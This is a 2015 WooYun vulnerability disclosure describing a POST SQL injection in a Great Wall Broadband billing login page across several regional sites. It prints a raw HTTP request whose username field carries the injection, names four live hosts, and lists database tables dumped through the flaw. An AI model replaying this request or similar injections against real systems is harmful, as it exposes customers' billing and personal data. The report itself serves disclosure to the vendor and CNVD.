当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129684

漏洞标题:长城宽带某计费系统通用存在POST注入漏洞(影响多个案例)

相关厂商:长城宽带

漏洞作者: 路人甲

提交时间:2015-08-10 09:39

修复时间:2015-11-09 14:32

公开时间:2015-11-09 14:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向第三方安全合作伙伴开放
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

长城宽带某计费系统通用存在POST注入漏洞(影响多个案例)

详细说明:

在家要弄宽带就百度了下当地的,发现一个长城宽带。
然后就发现了下面的事情,长城宽带计费系统,发现POST注入,然后百度了下关键字
长城宽带计费系统登陆,发现了各地好多,长城宽带计费全国各地代理通用系统

漏洞证明:

搜狗截图15年07月27日1430_22.png

POST /login.aspx HTTP/1.1
Host: help.szgwbn.net.cn
Content-Length: 495
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://help.szgwbn.net.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://help.szgwbn.net.cn/login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_11333d608f68408aeae2d69bbb4b361f=1437969558; Hm_lpvt_11333d608f68408aeae2d69bbb4b361f=1437969559; ASP.NET_SessionId=5r2poe55ynr1dmi5fg0vobab; CheckCode=04NJH
__VIEWSTATE=%2FwEPDwUKMTUwMDAxOTQ3Ng9kFgICAQ9kFgICCQ8PFgQeBFRleHQFceacjeWKoeWZqOaXoOazleWkhOeQhuivt%2BaxguOAgiAtLS0%2BIOWtl%2BespuS4siAnYWRtaW4nJyDlkI7nmoTlvJXlj7fkuI3lrozmlbTjgIIKJ2FkbWluJycg6ZmE6L%2BR5pyJ6K%2Bt5rOV6ZSZ6K%2Bv44CCHgdWaXNpYmxlZ2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQVidG5xZNkj0%2F5ZT01ReHK2HFMynZIeiiIr&__EVENTVALIDATION=%2FwEWBQK4nrW%2BAwLHvZLYDQK8963WBQL944T5DwKMk7GmBBZRR4zuYuWw50BgvO0NfXbyoaMu&tbUid=admin%27&tbPasswd=aaaa&tbCheckCode=04njh&btnqd.x=21&btnqd.y=0

sqlmap.png

sbssbsbsb.png

http://bill.szgwbn.net.cn/
http://help.szgwbn.net.cn/
http://alipay.gwbnsd.com
http://zfw.xmgwbn.com/

暂举全国各地的4个案例。主要是影响有点大,可以看到所有的长城宽带用户的套餐以及各种信息。

搜狗截图15年07月27日1336_17.png

xinxi1.png

搜狗截图15年07月27日1223_5.png

搜狗截图15年07月27日1304_9.png

搜狗截图15年07月27日1303_7.png

搜狗截图15年07月27日1304_8.png

[221 tables]
+---------------------------------------+
| A |
| A1 |
| A2 |
| A3 |
| AA |
| AA1 |
| AA12 |
| AAQ |
| A_Blishi |
| AccountItemList |
| Account_Business |
| Account_Business_View |
| Account_Businessbak |
| Account_Example |
| Account_Example2010 |
| Account_Examplebak |
| AcctTicket |
| AcctTicket20090422 |
| AcctTicketbak |
| AcctionTypeTable |
| AliasList |
| AllCommunityIncome |
| AllTicket |
| AppointmentList |
| AreaList |
| AreaSheQuTable |
| AreaSheQuTablebak |
| Auditing |
| Bank |
| BankFee |
| BankFeeLog |
| BankProtocal |
| BankProtocalDetail |
| BankProtocalLog |
| BindModeList |
| BmdBmuTable |
| BmdList |
| BmuAreaTable |
| BmuBusinessTable |
| BmuBusinessView |
| BmuList |
| BossLog |
| BossLogRsCmdView |
| BossLogView |
| BossLogbak |
| BrandList |
| BusinessClassList |
| BusinessList |
| BusinessType |
| CRMList |
| CRM_View |
| Card |
| Cardbak |
| ChargingUnitTypeList |
| ChargingValuatePolicyList |
| CheckStateList |
| CommunityList |
| CommunityListbak |
| CommunityMachineRoomTable |
| ConcessionPolicyList |
| ConcessionSessionList |
| CreditList |
| CustomerCRMAttribute |
| CustomerCRMAttributeList |
| CustomerCRMAttributeManageDomainTable |
| CustomerCRMAttributeTable |
| CustomerList |
| CustomerListbak20150713 |
| CustomerType |
| DM |
| DataDict |
| Day_AddUser |
| Day_AddUser2 |
| DevelopmenTypeList |
| DocCatalog |
| DocumentDetail |
| DocumentList |
| DocumentLog |
| Dw_Dim_AccountItem |
| Dw_Dim_AccountState |
| Dw_Dim_Brand |
| Dw_Dim_Community |
| Dw_Dim_Customer |
| Dw_Dim_DevelopmenType |
| Dw_Dim_DevelopmentState |
| Dw_Dim_Package |
| Dw_Dim_PaymentType |
| Dw_Dim_Product |
| Dw_Dim_UserServiceState |
| Dw_Dim_UserType |
| Dw_Fact_AccountAccruals |
| Dw_Fact_AccountBusiness |
| Dw_Fact_Bosslog |
| Dw_Fact_SalePackageLog |
| Dw_Fact_User |
| DynPropertySupportList |
| EfectiveStateType |
| EffectiveStateCount |
| EngineCaseList |
| Falseusefeemingxi |
| FeeApportionView |
| FunctionInverseParam |
| FunctionList |
| FunctionPositiveParam |
| FunctionType |
| IPTV_EquipmentList |
| IPTV_EquipmentLog |
| IPTV_EquipmentTypeList |
| IPTV_EquipmentUseLog |
| IPTV_PackageRights |
| IPTV_ProviderList |
| IPTV_TerminalCount |
| IPTV_TerminalList |
| IPTV_Userlog |
| InvoiceList |
| JTJYEffectiveStateCount |
| JTJYPresents |
| JTJYRMBRadiusMoneyTable |
| JTJYSalePackageSituation |
| LossReasonType |
| MachineList |
| MeteringPeriodList |
| OperateLog |
| Operation |
| OperatorRoleTable |
| PackageSatisticsList |
| PaymentTypeList |
| PolicyCombinationTable |
| PolicyList |
| PolicySessionList |
| PrepaidBalance |
| PresentList |
| PresentListbak |
| PrintJobList |
| ProductAttrList |
| ProductAttrTable |
| ProductCommunityTable |
| ProductList |
| ProductRadiusAttrTable |
| ProjectList |
| Quanzemingxi |
| RMBRadiusMoneyTable |
| RechargeCardList |
| RoleBusinessTable |
| RoleBusinessView |
| RoleList |
| RootAccountList |
| RsCmdList |
| RsCmdListbak |
| SalePackageLog |
| SalePackageLogbak |
| SaleTypeList |
| ServiceHallBmdTable |
| ServiceHallBmdTablebak |
| ServiceHallList |
| ServiceHallListbak |
| ServiceState |
| ServicehallDQTable |
| StoredProcedureList |
| TimeConcession_Day |
| TimePolicyList |
| UnitTypeList |
| UserBackFeeBill |
| UserBill |
| UserLinkInfo |
| UserList |
| UserPriceAdjustment |
| UserProductCustomizeAttrTable |
| UserProductCustomizeAttrTablebak |
| VBossLog |
| VBossLog2 |
| VBossLog_SMS |
| VSalePackageLog2 |
| V_AccountExample |
| V_Account_Business |
| V_Account_Example |
| V_CommunityList |
| V_CustomerBirth |
| V_Customer_PriceAdjust |
| V_Customer_User |
| V_Customer_User_SMS |
| V_Customer_User_Test |
| V_Customers |
| V_UserLocation_Test |
| ValuateList |
| VlanList |
| bosslogbei140113 |
| cardbak12 |
| dtproperties |
| shequlist |
| sqlmapoutput |
| sys_user |
| sysdiagrams |
| uselistbak |
| vAllUser |
| vBA_Business |
| vBA_BusinessAccount |
| vBA_BusinessCustomer |
| vBA_BusinessCustomerInfo |
| vBA_BusinessDocument |
| vBA_BusinessLog |
| vBA_BusinessSale |
| vBA_DevisionOfWorks |
| vBA_RootAccountList |
| vBankFee |
| vBankProtocal |
| vBridge_BossLog |
| vBridge_ReminderFee |
| vCustomerUserList |
| vInvoiceList |
| vPolicyList |
| vProductFeePeriod |
| vProductSet |
| vProduct_MeteringPeriod |
| vReceiptList |
| vSalePackageLog |
| vSalePackageLog2_base |
| vUserAccount |
| vsys_user |
| xufeiList |
| yuyue |
+---------------------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-11 14:30

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无